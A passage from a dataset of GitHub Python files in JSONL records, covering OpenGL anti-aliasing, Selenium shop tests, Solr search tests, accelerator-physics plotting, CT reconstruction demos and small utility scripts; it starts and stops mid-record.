{}\n\t\tfor i, key in enumerate(keys):\n\t\t\tif i < len(alist):\n\t\t\t\ttry:\n\t\t\t\t\tadict[key] = int(alist[i])\n\t\t\t\texcept ValueError:\n\t\t\t\t\tadict[key] = alist[i]\n\t\treturn adict\n\n\tdef dict2list(self, adict, keys):\n\t\tlogger.debug(\"adict: %s\", adict)\n\t\talist = []\n\t\tfor key in keys:\n\t\t\tif key in adict:\n\t\t\t\talist.append(adict[key])\n\t\t\telse:\n\t\t\t\talist.append(\"\")\n\t\treturn alist\n\n\tdef readMeta(self, path):\n\t\tmeta_list = readFile(path).splitlines()\n\t\tmeta_list = [list_item.strip() for list_item in meta_list]\n\t\treturn meta_list\n\n\tdef getMeta(self):\n\t\tself.meta.update(self.xmeta)\n\t\tlogger.debug(\"meta: %s\", self.meta)\n\t\treturn self.meta\n\n\tdef updateXMeta(self, xmeta):\n\t\tlogger.debug(\"xmeta: %s\", xmeta)\n\t\tself.xmeta.update(xmeta)\n\t\tlogger.debug(\"self.xmeta: %s\", 
self.xmeta)\n\t\tself.saveXMeta()\n\n\tdef saveXMeta(self):\n\t\talist = self.dict2list(self.xmeta, self.xmeta_keys)\n\t\tdata = \"\\n\".join([str(line) for line in alist])\n\t\twriteFile(self.xmeta_path, data)\n","repo_name":"dream-alpha/CacheCockpit","sub_path":"src/ParserMetaFile.py","file_name":"ParserMetaFile.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18315509217","text":"import numpy as np\nimport os\n\nfrom OpenGL.GL import *\nfrom OpenGL.GL.framebufferobjects import *\nfrom OpenGL.arrays import vbo\n\nfrom ..textures import Texture\nfrom ..shaders import set_uniform, compileShader\nfrom .base import AbstractEffect\n\n\nclass FXAAEffect(AbstractEffect):\n '''Fast Approximate Anti Aliasing. It is an efficient way to add\n anti-aliasing to your scenes. The reason to have it is to\n reduce jagged lines.\n\n The parameters *span_max*, *reduce_mul*, *reduce_min* are\n tweakable even if it is suggested to keep them at their default value.\n\n .. image:: /_static/fxaa_on_off.png\n :width: 800px\n \n '''\n def __init__(self, widget, span_max = 4.0, reduce_mul=1/8.0, reduce_min=1/128.0):\n self.widget = widget\n curdir = os.path.dirname(__file__)\n \n vert = open(os.path.join(curdir, 'shaders', 'noeffect.vert')).read()\n frag = open(os.path.join(curdir, 'shaders', 'fxaa.frag')).read() \n # Compile quad shader\n vertex = compileShader(vert, GL_VERTEX_SHADER)\n fragment = compileShader(frag, GL_FRAGMENT_SHADER)\n \n self.span_max = span_max\n self.reduce_mul = reduce_mul\n self.reduce_min = reduce_min\n \n self.quad_program = shaders.compileProgram(vertex, fragment)\n\n def render(self, fb, texturedict):\n glBindFramebuffer(GL_FRAMEBUFFER, fb)\n glViewport(0, 0, self.widget.width(), self.widget.height())\n \n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glUseProgram(self.quad_program)\n \n set_uniform(self.quad_program, 'FXAA_SPAN_MAX', '1f', self.span_max)\n set_uniform(self.quad_program, 'FXAA_REDUCE_MUL', '1f', self.reduce_mul)\n set_uniform(self.quad_program, 'FXAA_REDUCE_MIN', '1f', self.reduce_min)\n \n qd_id = glGetUniformLocation(self.quad_program, b\"textureSampler\")\n texture = texturedict['color']\n \n # Setting up the texture\n glActiveTexture(GL_TEXTURE0)\n texture.bind()\n \n # Set our \"quad_texture\" sampler to user Texture Unit 0\n glUniform1i(qd_id, 0)\n # Set resolution\n res_id = glGetUniformLocation(self.quad_program, b\"texcoordOffset\")\n glUniform2f(res_id, 1.0/self.widget.width(), 1.0/self.widget.height())\n\n # # Let's render a quad\n quad_data = np.array([-1.0, -1.0, 0.0,\n 1.0, -1.0, 0.0,\n -1.0, 1.0, 0.0,\n -1.0, 1.0, 0.0,\n 1.0, -1.0, 0.0,\n 1.0, 1.0, 0.0],\n dtype='float32')\n \n vboquad = vbo.VBO(quad_data)\n vboquad.bind()\n \n glVertexPointer(3, GL_FLOAT, 0, None) \n glEnableClientState(GL_VERTEX_ARRAY)\n\n # draw \"count\" points from the VBO\n glDrawArrays(GL_TRIANGLES, 0, 6)\n \n vboquad.unbind()\n glDisableClientState(GL_VERTEX_ARRAY)\n \n def on_resize(self, w, h):\n pass","repo_name":"chemlab/chemlab","sub_path":"chemlab/graphics/postprocessing/fxaa.py","file_name":"fxaa.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":204,"dataset":"github-code","pt":"5"} +{"seq_id":"29899910725","text":"import os.path\n\nclass proxy_opts:\n auto = 'auto'\n manual = 'manual'\n noProxy = 'noProxy'\n\nclass schedule_opts:\n manual = 'manual'\n runEvery = 'runEvery'\n days = 'days'\n\nclass 
upload_opts:\n    manual = 'manual'\n    auto = 'auto'\n\ntimeFormat = 'hh:mm:ss'\ndateFormat = 'yyyy-MM-ddThh:mm:ss'\nrunEvery_opts = ['hour', 'minute']\nweekDaysStr = ['sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat']\ntourDisplayReasons = ['uncoupling', 'publish']\n\naccount_loginType = 'account/loginType'\naccount_rememberLogin = 'account/rememberLogin'\naccount_username = 'account/username'\naccount_password = 'account/password'\naccount_runOnStartup = 'account/runOnStartup'\naccount_sendErrorLog = 'account/sendErrorLog'\naccount_language = 'account/language'\naccount_dropboxPrompted = 'account/dropboxPrompted'\n\noauth_googleExpiry = 'oauth/googleExpiry'\noauth_facebookExpiry = 'oauth/facebookExpiry'\n\ncompute_rootFolder = 'compute/rootFolder'\ncompute_usersFolders = 'compute/usersFolders'\n\nschedule_runEvery_value = 'schedule/runEvery_value'\nschedule_runEvery_unit = 'schedule/runEvery_unit'\nschedule_day_sun = 'schedule/day_sun'\nschedule_day_mon = 'schedule/day_mon'\nschedule_day_tue = 'schedule/day_tue'\nschedule_day_wed = 'schedule/day_wed'\nschedule_day_thu = 'schedule/day_thu'\nschedule_day_fri = 'schedule/day_fri'\nschedule_day_sat = 'schedule/day_sat'\nschedule_day_time = 'schedule/day_time'\nschedule_upload = 'schedule/upload'\nschedule_schedule = 'schedule/schedule'\n\nvcs_installed_version = 'vcs/installedVersion'\nvcs_new_version = 'vcs/newVersionInstalled'\nvcs_new_version_path = 'vcs/newVersionPath'\nvcs_startup_version = 'vcs/startupVersion'\nvcs_events_notified = 'vcs/eventsNotified'\n\nstatus_showFinished = 'status/showFinished'\nstatus_showPath = 'status/showPath'\nstatus_showPending = 'status/showPending'\n\nno_proxy = 'connection/noProxy'\nproxy_server = 'connection/proxyServer'\nproxy_port = 'connection/proxyPort'\nproxy_protocol = 'connection/proxyScheme'\nproxy_is_authenticated = 'connection/isProxyAuthenticated'\nproxy_user = 'connection/proxyUser'\nproxy_password = 'connection/proxyPassword'\nproxy_connection = 'connection/proxyConnection'\n","repo_name":"SimeonRolev/iOS-Windows-settings-parser","sub_path":"config_parser/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} {"seq_id":"42409314477","text":"class Person(object):\n    def __init__(self, name, age):\n        self.name = name\n        self.age = age\n\n    def __str__(self):\n        return \"<{} {}>\".format(self.name, self.age)\n\n\np = Person(\"小黑\", 18)\nprint(p)\np2 = Person(\"高材生\", 9000)\nprint(p2)","repo_name":"leiqing110/Django-Restaurant","sub_path":"APP01/类的__str__方法.py","file_name":"类的__str__方法.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} {"seq_id":"17536019661","text":"from subprocess import call, DEVNULL\nimport sys\n\n\ndef run_editor(cmds):\n    for cmd in cmds:\n        if program_exists(cmd[0]):\n            call(cmd)\n            break\n    else:\n        print('No editors found (tried {})'\n              .format(', '.join(x[0] for x in cmds)))\n        sys.exit(1)\n\n\ndef program_exists(name):\n    return call(['which', name], stdout=DEVNULL, stderr=DEVNULL) == 0\n","repo_name":"chriswatrous/scripts","sub_path":"bin/edit_helpers.py","file_name":"edit_helpers.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} {"seq_id":"1773972724","text":"import pytest\nfrom .pages.product_page import ProductPage\nfrom .pages.basket_page import BasketPage\nfrom .pages.login_page import 
LoginPage\nimport time, secrets\n\nlink = 'http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209/?promo=newYear'\n\nclass TestUserAddToBasketFromProductPage():\n\n    @pytest.fixture(scope=\"function\", autouse=True)\n    def setup(self, browser):\n        registration_email = f'{str(time.time())}@fakemail.org'\n        registration_password = secrets.token_urlsafe(8)\n        self.link = link\n        self.browser = browser\n        self.page = ProductPage(self.browser, self.link)\n        self.page.open()\n        self.login_page = self.page.go_to_login_page()\n        self.login_page = LoginPage(self.browser, self.link)\n        self.login_page.register_new_user(registration_email, registration_password)\n        self.login_page.should_be_authorized_user()\n\n    def test_user_cant_see_success_message(self):\n        self.page.should_not_be_success_message()\n\n    @pytest.mark.need_review\n    def test_user_can_add_product_to_basket(self):\n        self.page.click_basket_button()\n\n@pytest.mark.need_review\ndef test_guest_can_add_product_to_basket(browser):\n    page = ProductPage(browser, link)\n    page.open()\n    page.click_basket_button()\n    page.solve_quiz_and_get_code()\n    page.should_be_right_book()\n\n@pytest.mark.skip\ndef test_guest_cant_see_success_message_after_adding_product_to_basket(browser):\n    page = ProductPage(browser, link)\n    page.open()\n    page.click_basket_button()\n    page.solve_quiz_and_get_code()\n    page.should_not_be_success_message()\n\n\n@pytest.mark.skip\ndef test_message_disappeared_after_adding_product_to_basket(browser):\n    page = ProductPage(browser, link)\n    page.open()\n    page.click_basket_button()\n    page.solve_quiz_and_get_code()\n    page.should_disapear()\n\n@pytest.mark.skip\ndef test_guest_should_see_login_link_on_product_page(browser):\n    page = ProductPage(browser, link)\n    page.open()\n    page.should_be_login_link()\n\n@pytest.mark.need_review\ndef test_guest_can_go_to_login_page_from_product_page(browser):\n    page = ProductPage(browser, link)\n    page.open()\n    page.go_to_login_page()\n\n@pytest.mark.need_review\ndef test_guest_cant_see_product_in_basket_opened_from_product_page(browser):\n    page = ProductPage(browser, link)\n    page.open()\n    basket_page = page.go_to_basket_page()\n    basket_page = BasketPage(browser, browser.current_url)\n    basket_page.should_not_be_items_in_basket()\n    basket_page.should_be_empty_basket()\n","repo_name":"Fidochek/SeleniumProject","sub_path":"test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} {"seq_id":"44442903365","text":"from unittest import defaultTestLoader\nfrom nva.universalsearch.tests.base import SolrTestCase\n\nfrom os import environ\nfrom transaction import abort, commit\nfrom zope.component import getUtility\nfrom zope.schema.interfaces import IVocabularyFactory\nfrom collective.solr.interfaces import ISolrConnectionConfig\nfrom collective.solr.interfaces import ISearch\nfrom collective.solr.dispatcher import solrSearchResults\nfrom collective.solr.utils import activate\nfrom nva.universalsearch.interfaces import IUniversalSearchConfig\n\n\ndef indexForDifferentSystem(obj, system='Other'):\n    from collective.solr.indexer import SolrIndexProcessor\n    original = SolrIndexProcessor.getData\n\n    def getData(self, obj, attributes=None):\n        data, missing = original(self, obj, attributes)\n        data['UID'] = system + '.' 
+ data['UID'] # uid needs to be unique\n data['system'] = system\n return data, missing\n\n SolrIndexProcessor.getData = getData\n obj.processForm()\n commit()\n SolrIndexProcessor.getData = original\n\n\nclass SolrServerTests(SolrTestCase):\n\n def afterSetUp(self):\n activate()\n self.portal.REQUEST.RESPONSE.write = lambda x: x # ignore output\n self.config = getUtility(ISolrConnectionConfig)\n if 'SOLR_PORT' in environ:\n self.config.port = int(environ['SOLR_PORT'])\n self.maintenance = self.portal.unrestrictedTraverse('solr-maintenance')\n self.maintenance.clear()\n self.search = getUtility(ISearch)\n\n def beforeTearDown(self):\n # due to the `commit()` in the tests below the activation of the\n # solr support in `afterSetUp` needs to be explicitly reversed,\n # but first all uncommitted changes made in the tests are aborted...\n abort()\n self.config.active = False\n commit()\n\n def testObjectCanBeSearchedViaSystemIndex(self):\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n indexForDifferentSystem(self.folder)\n system = self.portal.Title()\n self.assertEqual(len(self.search('+system:\"%s\"' % system)), 1)\n # without specifying the 'system' we should get two results\n self.assertEqual(len(self.search('+system:*')), 2)\n\n def testFullUriIsStoredInSolr(self):\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n self.assertEqual([r.uri for r in self.search('*:*')],\n [self.folder.absolute_url()])\n\n def testFullCustomizedUriIsStoredInSolr(self):\n config = getUtility(IUniversalSearchConfig)\n config.site_url = 'http://foo.com'\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n self.assertEqual([r.uri for r in self.search('*:*')],\n ['http://foo.com/Members/' + self.folder.getId()])\n\n def testSystemsVocabulary(self):\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n indexForDifferentSystem(self.folder)\n vocab = getUtility(IVocabularyFactory, name='nva.universalsearch.systems')\n self.assertEqual([i.token for i in vocab(self.portal)],\n ['Other', 'Plone site'])\n\n def testSearchResultsAreFilteredBySystems(self):\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n indexForDifferentSystem(self.folder)\n # by default 'systems' isn't set and we're getting all results\n results = solrSearchResults(SearchableText='Foo')\n self.assertEqual(sorted([(r.Title, r.system) for r in results]),\n [('Foo', 'Other'), ('Foo', 'Plone site')])\n # after setting 'systems' we only get results for those...\n config = getUtility(IUniversalSearchConfig)\n config.systems = ['Plone site']\n results = solrSearchResults(SearchableText='Foo')\n self.assertEqual(sorted([(r.Title, r.system) for r in results]),\n [('Foo', 'Plone site')])\n\n def testSearchResultsCanBeLimitedViaRequestParameters(self):\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n indexForDifferentSystem(self.folder)\n config = getUtility(IUniversalSearchConfig)\n config.systems = ['Plone site', 'Other'] # all 'systems' are allowed\n # explicitly setting an allowed 'system' limits results\n request = dict(SearchableText='[* TO *]', system='Other')\n results = solrSearchResults(request)\n self.assertEqual(sorted([(r.Title, r.system) for r in results]),\n [('Foo', 'Other')])\n\n def testOtherSystemsCannotBeSearchedViaRequestParameters(self):\n self.folder.processForm(values={'title': 'Foo'})\n 
commit()  # indexing happens on commit\n        indexForDifferentSystem(self.folder)\n        config = getUtility(IUniversalSearchConfig)\n        config.systems = ['Plone site']\n        # explicitly setting another 'system' mustn't yield results\n        request = dict(SearchableText='[* TO *]', system='Other')\n        results = solrSearchResults(request)\n        self.assertEqual(sorted([(r.Title, r.system) for r in results]),\n                         [('Foo', 'Plone site')])\n\n\ndef test_suite():\n    return defaultTestLoader.loadTestsFromName(__name__)\n","repo_name":"witsch/novareto","sub_path":"nva.universalsearch/trunk/src/nva/universalsearch/tests/test_indexes.py","file_name":"test_indexes.py","file_ext":"py","file_size_in_byte":5499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} {"seq_id":"41892482273","text":"from pmd_beamphysics.units import nice_array, nice_scale_prefix\nfrom pmd_beamphysics.labels import mathlabel\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\n\ndef plot_stats(genesis4_object, keys=[\"beam_xsize\", \"beam_ysize\"], tex=False, **kwargs):\n    \"\"\"\n    Plots stats\n\n    \"\"\"\n    nplots = len(keys)\n\n    fig, axs = plt.subplots(nplots, **kwargs)\n\n    # Make RHS axis for the solenoid field.\n    xdat = genesis4_object.stat(\"zplot\")\n    xmin = min(xdat)\n    xmax = max(xdat)\n    for i, key in enumerate(keys):\n        ax = axs[i]\n\n        ydat = genesis4_object.stat(key)\n        ydat = np.mean(ydat, axis=1)  # Average over slices\n\n        ndat, factor, prefix = nice_array(ydat)\n        unit = genesis4_object.units(key)\n        units = f\"{prefix}{unit}\"\n        # Handle label\n        ylabel = mathlabel(key, units=units, tex=tex)\n        ax.set_ylabel(ylabel)\n        ax.set_xlim(xmin, xmax)\n        ax.plot(xdat, ndat)\n        ax.set_xlabel(\"z (m)\")\n\n\ndef add_layout_to_axes(\n    genesis4_object,\n    *,\n    ax=None,\n    bounds=None,\n    xfactor=1,\n    add_legend=False,\n):\n    \"\"\"\n    Adds undulator layout to an axes.\n\n    \"\"\"\n\n    if bounds is None:\n        zmin, zmax = 0, genesis4_object.stat(\"z\").max()\n    else:\n        zmin, zmax = bounds\n    ax.set_xlim(zmin, zmax)\n\n    dat = {}\n    ax2 = ax.twinx()\n\n    ax.set_xlabel(r\"$z$ (m)\")\n\n    zlist = genesis4_object.stat(\"z\")\n\n    lines = []\n    for ax1, component, color, label, units in (\n        (ax, \"aw\", \"red\", r\"$aw$\", \"1\"),\n        (ax2, \"qf\", \"blue\", r\"Quad $k$\", r\"$1/m^2$\"),\n    ):\n        fz = genesis4_object.stat(component)\n\n        y, factor, prefix = nice_array(fz)\n\n        line = ax1.fill_between(zlist / xfactor, y, color=color, label=label, alpha=0.5)\n        # lines += line\n\n        ylabel = f\"{label} ({prefix}{units})\"\n        ax1.set_ylabel(ylabel)\n\n    labels = [line.get_label() for line in lines]\n    if add_legend:\n        ax.legend(lines, labels)\n\n\ndef plot_stats_with_layout(\n    genesis4_object,\n    ykeys=\"field_energy\",\n    ykeys2=[],\n    xkey=\"zplot\",\n    xlim=None,\n    ylim=None,\n    ylim2=None,\n    yscale='linear',\n    yscale2='linear',\n    nice=True,\n    tex=False,\n    include_layout=True,\n    include_labels=True,\n    include_legend=True,\n    return_figure=False,\n    **kwargs,\n):\n    \"\"\"\n    Plots stat output for multiple keys.\n\n    If a list of ykeys2 is given, these will be put on the right hand axis. This can also be given as a single key.\n\n    Logical switches:\n    nice: a nice SI prefix and scaling will be used to make the numbers reasonably sized. Default: True\n\n    tex: use mathtext (TeX) for plot labels. Default: False\n\n    include_legend: The plot will include the legend. Default: True\n\n    include_layout: the layout plot will be displayed at the bottom. 
Default: True\n\n return_figure: return the figure object for further manipulation. Default: False\n\n \"\"\"\n if include_layout:\n fig, all_axis = plt.subplots(2, gridspec_kw={\"height_ratios\": [4, 1]}, **kwargs)\n ax_layout = all_axis[-1]\n ax_plot = [all_axis[0]]\n else:\n fig, all_axis = plt.subplots(**kwargs)\n ax_plot = [all_axis]\n\n # collect axes\n if isinstance(ykeys, str):\n ykeys = [ykeys]\n\n if ykeys2:\n if isinstance(ykeys2, str):\n ykeys2 = [ykeys2]\n ax_twinx = ax_plot[0].twinx()\n ax_plot.append(ax_twinx)\n\n # No need for a legend if there is only one plot\n if len(ykeys) == 1 and not ykeys2:\n include_legend = False\n\n # assert xkey == 'mean_z', 'TODO: other x keys'\n\n X = genesis4_object.stat(xkey)\n\n # Only get the data we need\n if xlim:\n good = np.logical_and(X >= xlim[0], X <= xlim[1])\n X = X[good]\n else:\n xlim = X.min(), X.max()\n good = slice(None, None, None) # everything\n\n # X axis scaling\n units_x = str(genesis4_object.units(xkey))\n if nice:\n X, factor_x, prefix_x = nice_array(X)\n units_x = prefix_x + units_x\n else:\n factor_x = 1\n\n # set all but the layout\n\n # Handle tex labels\n xlabel = mathlabel(xkey, units=units_x, tex=tex)\n\n for ax in ax_plot:\n ax.set_xlim(xlim[0] / factor_x, xlim[1] / factor_x)\n ax.set_xlabel(xlabel)\n\n # Draw for Y1 and Y2\n\n linestyles = [\"solid\", \"dashed\"]\n\n ii = -1 # counter for colors\n for ix, keys in enumerate([ykeys, ykeys2]):\n if not keys:\n continue\n ax = ax_plot[ix]\n linestyle = linestyles[ix]\n\n # Check that units are compatible\n ulist = [genesis4_object.units(key) for key in keys]\n if len(ulist) > 1:\n for u2 in ulist[1:]:\n assert ulist[0] == u2, f\"Incompatible units: {ulist[0]} and {u2}\"\n # String representation\n unit = str(ulist[0])\n\n # Data\n data = [genesis4_object.stat(key)[good] for key in keys]\n\n if nice:\n factor, prefix = nice_scale_prefix(np.ptp(data))\n unit = prefix + unit\n else:\n factor = 1\n\n # Make a line and point\n for key, dat in zip(keys, data):\n #\n ii += 1\n color = \"C\" + str(ii)\n\n # Handle tex labels\n label = mathlabel(key, units=unit, tex=tex)\n ax.plot(X, dat / factor, label=label, color=color, linestyle=linestyle)\n\n # Handle tex labels\n ylabel = mathlabel(*keys, units=unit, tex=tex)\n ax.set_ylabel(ylabel)\n \n # Scaling(e.g. 
\"linear\", \"log\", \"symlog\", \"logit\")\n if ix == 0:\n ax.set_yscale(yscale)\n else:\n ax_twinx.set_yscale(yscale2)\n\n # Set limits, considering the scaling.\n if ix == 0 and ylim:\n ymin = ylim[0]\n ymax = ylim[1]\n # Handle None and scaling\n if ymin is not None:\n ymin = ymin / factor\n if ymax is not None:\n ymax = ymax / factor\n new_ylim = (ymin, ymax)\n ax.set_ylim(new_ylim)\n # Set limits, considering the scaling.\n if ix == 1 and ylim2:\n pass\n # TODO\n if ylim2:\n ymin2 = ylim2[0]\n ymax2 = ylim2[1]\n # Handle None and scaling\n if ymin2 is not None:\n ymin2 = ymin2 / factor\n if ymax2 is not None:\n ymax2 = ymax2 / factor\n new_ylim2 = (ymin2, ymax2)\n ax_twinx.set_ylim(new_ylim2)\n else:\n pass\n\n # Collect legend\n if include_legend:\n lines = []\n labels = []\n for ax in ax_plot:\n a, b = ax.get_legend_handles_labels()\n lines += a\n labels += b\n ax_plot[0].legend(lines, labels, loc=\"best\")\n\n # Layout\n if include_layout:\n # Gives some space to the top plot\n ax_layout.set_ylim(-1, 1.5)\n\n # if xkey == 'mean_z':\n # ax_layout.set_xlim(xlim[0], xlim[1])\n # else:\n # ax_layout.set_xlabel('mean_z')\n # xlim = (0, I.stop)\n add_layout_to_axes(genesis4_object, ax=ax_layout, bounds=xlim)\n\n if return_figure:\n return fig\n","repo_name":"slaclab/lume-genesis","sub_path":"genesis/version4/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"25213796228","text":"\"\"\"\nscatter.py\n==========\n\nThis module provides a function to display a scatter plot using the ClusterFun library.\nIt allows users to create a scatter plot of two columns of data.\n\"\"\"\nfrom typing import Optional\n\nimport pandas as pd\n\nfrom clusterfun.config import Config\nfrom clusterfun.plot import Plot\nfrom clusterfun.plot_types import DOCSTRING_STANDARD\nfrom clusterfun.storage.local.helpers import get_columns_for_db\nfrom clusterfun.validation import validate\n\n\ndef scatter(\n df: pd.DataFrame,\n x: str,\n y: str,\n media: str,\n color: Optional[str] = None,\n bounding_box: Optional[str] = None,\n title: Optional[str] = None,\n show: bool = True,\n): # pylint: disable=too-many-arguments,missing-function-docstring\n cfg = Config(\n type=\"scatter\",\n x=x,\n y=y,\n media=media,\n columns=get_columns_for_db(df, media, \"scatter\", x, y),\n color=color,\n bounding_box=bounding_box,\n title=title,\n )\n validate(df, cfg)\n return Plot.save(df, cfg).show(show)\n\n\nscatter.__doc__ = (\n \"\"\"\n :param df: pd.DataFrame\n The dataframe with the data to plot\n :param x: str\n The column name of the data to plot on the x-axis.\n :param y: str\n The column name of the data to plot on the y-axis.\n \"\"\"\n + DOCSTRING_STANDARD\n)\n","repo_name":"gietema/clusterfun","sub_path":"clusterfun/plot_types/scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"5"} +{"seq_id":"3639697738","text":"import tigre\nimport numpy as np\nfrom tigre.utilities import sample_loader\nfrom tigre.utilities import CTnoise\nimport tigre.algorithms as algs\nfrom matplotlib import pyplot as plt\n\n#%% Geometry\ngeo = tigre.geometry_default(high_resolution=False)\n\n#%% Load data and generate projections\n# define angles\nangles = np.linspace(0, 2 * np.pi, 100)\n# Load thorax phatom data\nhead = sample_loader.load_head_phantom(geo.nVoxel)\n# generate projections\nprojections = 
tigre.Ax(head, geo, angles)\n# add noise\nnoise_projections = CTnoise.add(projections, Poisson=1e5, Gaussian=np.array([0, 10]))\n\n#%% Usage CGLS\n#\n#\n# CGLS has the common 4 inputs for iterative algorithms in TIGRE:\n#\n# Projections, geometry, angles, and number of iterations\n#\n# Additionally it contains optional initialization techniques, but we\n# recommend not using them. CGLS is already quite fast and using them may\n# lead to divergence.\n# The options are:\n# 'Init' Describes different initialization techniques.\n# - 'none' : Initializes the image to zeros (default)\n# - 'FDK' : initializes image to FDK reconstruction\n# - 'multigrid': Initializes image by solving the problem in\n# small scale and increasing it when relative\n# convergence is reached.\n# - 'image' : Initialization using a user specified\n# image. Not recommended unless you really\n# know what you are doing.\n# 'InitImg' an image for the 'image' initialization. Avoid.\n\n# # use CGLS\nimgCGLS, normL2CGLS = algs.cgls(noise_projections, geo, angles, 30, computel2=True)\n# use LSQR\nimgLSQR, normL2LSQR = algs.lsqr(noise_projections, geo, angles, 30, computel2=True)\n# use LSMR\nimgLSMR, normL2LSMR = algs.lsmr(noise_projections, geo, angles, 30, computel2=True,lmbda=0)\nimgLSMR2, normL2LSMR2 = algs.lsmr(noise_projections, geo, angles, 30, computel2=True,lmbda=30)\n# use hybrid LSQR\nimghLSQR, normhL2LSQR = algs.hybrid_lsqr(noise_projections, geo, angles, 30, computel2=True)\n\n# AB/BA-GMRES\nimgabgmres, normhabgmres = algs.ab_gmres(noise_projections, geo, angles, 30, computel2=True)\nimgbagmres, normhbagmres = algs.ba_gmres(noise_projections, geo, angles, 30, computel2=True)\n# # AB/BA-GMRES with FDK backprojector\nimgabgmresfdk, normhabgmresfdk = algs.ab_gmres(noise_projections, geo, angles, 30, computel2=True,backprojector=\"FDK\")\nimgbagmresfdk, normhbagmresfdk = algs.ba_gmres(noise_projections, geo, angles, 30, computel2=True,backprojector=\"FDK\")\n\n\n# SIRT for comparison.\nimgSIRT, normL2SIRT = algs.sirt(noise_projections, geo, angles, 60, computel2=True)\n\n#%% plot results\n#\n# We can see that CGLS gets to the same L2 error in fewer\n# iterations.\n\n\n\nplt.plot(np.vstack((normL2CGLS[0, :], normL2SIRT[0, 0:30],normL2LSMR[0, :],normL2LSMR2[0, :],normhL2LSQR[0, :],normhabgmres[0,:],normhbagmres[0,:],normhabgmresfdk[0,:],normhbagmresfdk[0,:])).T)\nplt.title(\"L2 error\")\nplt.xlabel(\"Iteration\")\nplt.ylabel(\"$ |Ax-b| $\")\nplt.gca().legend((\"CGLS\", \"SIRT\",\"LSMR lambda=0\", \"LSMR lambda=30\",\"hybrid LSQR\",\"AB-GMRES\",\"BA-GMRES\",\"AB-GMRES FDK\",\"BA-GMRES FDK\"))\nplt.show()\n# plot images\ntigre.plotimg(np.concatenate([np.concatenate([imgCGLS, imgSIRT, imgLSQR,imgabgmres,imgabgmresfdk],axis=1),np.concatenate([imgLSMR, imgLSMR2, imghLSQR,imgbagmres,imgbagmresfdk], axis=1)], axis=2), dim=\"z\", step=2,clims=[0, 2])\n# plot errors\ntigre.plotimg(np.concatenate([np.concatenate([head-imgCGLS, head-imgSIRT, head-imgLSQR, head-imgabgmres, head-imgabgmresfdk],axis=1),np.concatenate([head-imgLSMR, head-imgLSMR2, head-imghLSQR,head-imgbagmres,head-imgbagmresfdk], axis=1)], axis=2), dim=\"z\", slice=32)\n","repo_name":"CERN/TIGRE","sub_path":"Python/demos/d08_Algorithms03.py","file_name":"d08_Algorithms03.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","stars":450,"dataset":"github-code","pt":"5"} +{"seq_id":"44474578114","text":"from analyze import analyze\nfrom aylienapiclient import textapi\n\nclient = textapi.Client(\"\", \"\")\n\ndef 
summarizeArticle(url):\n\tsummary = \"\"\n\tsummaryResponse = client.Summarize({'url': url, 'sentences_number': 4})\n\tfor sentence in summaryResponse['sentences']:\n\t\tsummary += \"--\" + sentence +\"\\n\\n\"\n\treturn summary\n","repo_name":"bcaton85/Summary","sub_path":"backend/summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11469682389","text":"n = int(input())\nd={}\nfor i in range(n):\n a = int(input())\n if a in d:\n d[a]+=1\n else:\n d.update({a:1})\na = list(d.keys())\nif(len(d)==2 and d[a[0]]==d[a[1]]):\n print(\"YES\")\n print(\"{} {}\".format(a[0],a[1]))\nelse:\n print(\"NO\")","repo_name":"shaarangg/CP-codes","sub_path":"codeforces/Python/fair_game.py","file_name":"fair_game.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70878563991","text":"import request\nimport re\n\n\ndef part_one(rules, messages):\n patterns = to_patterns(rules)\n count = 0\n\n for message in messages:\n if re.fullmatch(patterns['0'], message):\n count += 1\n\n return count\n\n\ndef part_two(rules, messages):\n rules['8'] = '(42)+'\n rules['11'] = ' | '.join([' '.join(['42'] * i) + ' ' + ' '.join(['31'] * i) for i in range(1, 10)])\n patterns = to_patterns(rules)\n count = 0\n\n for message in messages:\n if re.fullmatch(patterns['0'], message):\n count += 1\n\n return count\n\n\ndef to_rules(text):\n rules = {}\n\n for line in text.splitlines():\n (key, value) = line.split(': ')\n rules[key] = value\n\n return rules\n\n\ndef to_patterns(rules):\n patterns = {}\n items = list(rules.items())\n\n while items:\n for i in reversed(range(len(items))):\n key, value = items[i]\n\n if not re.search(r'\\d', value):\n if re.search(r'\\|', value):\n patterns[key] = f'({value.replace(\" \", \"\")})'\n else:\n patterns[key] = value.replace(' ', '')\n\n items.pop(i)\n\n 